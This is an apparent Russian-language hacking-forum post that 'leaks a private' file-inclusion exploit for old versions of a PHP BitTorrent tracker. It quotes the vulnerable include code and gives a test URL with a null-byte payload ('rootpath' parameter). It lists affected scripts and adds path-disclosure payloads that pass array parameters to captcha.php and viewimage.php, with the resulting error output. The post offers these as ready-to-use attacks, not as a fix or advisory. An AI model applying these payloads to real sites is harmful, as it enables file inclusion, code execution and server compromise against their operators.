Ну лан спалю одын приват =) на те старые версии
куча LFI & RFI =) мб и не приват
к примеру файл recover.php
PHP код:
require "include/bittorrent.php";
dbconn();
if ($_SERVER["REQUEST_METHOD"] == "POST")
{
подгружает файлик bittorrent.php а в нем
PHP код:
if (empty($rootpath))
$rootpath = ROOT_PATH;
require_once($rootpath . 'include/core.php');
?>
если прочесть его, то по смыслу ,если $rootpath не пустой ,тогда такой $rootpath = ROOT_PATH; замены не будет; и значит - уязвим
надеюсь я правильно его прочел))
При REGISTER_globals = on и MQ= off
http://127.0.0.1/treker/recover.php?rootpath='%00
Warning: require_once(') [function.require-once]: failed to open stream: No such file or directory in C:\xampp\htdocs\treker\include\bittorrent.php on line 57
файлы имеющие такую особенность :
faq.php
recover.php
bookmarks.php
rules.php
download.php
....по моему почти все =\
Раскрытие путей :
так как mysql_real_escape_string
PHP код:
function sqlesc($value) {
// Stripslashes
/*if (get_magic_quotes_gpc()) {
$value = stripslashes($value);
}*/
// Quote if not a number or a numeric string
if (!is_numeric($value)) {
$value = "'" . mysql_real_escape_string($value) . "'";
}
return $value;
}
captcha.php?imagehash[]=
Warning: mysql_real_escape_string() expects parameter 1 to be string, array given in C:\xampp\htdocs\treker\include\functions.php on line 462
гуглом поискал не нашел))
еще раскрытие путей
PHP код:
$pic = htmlspecialchars($_GET["pic"]);
stdhead("Просмотр картинки");
print("<h1>$pic</h1>\n");
print("<p align=center><img src=\"torrents/images/$pic\"></p>\n");
?>
viewimage.php?pic[]=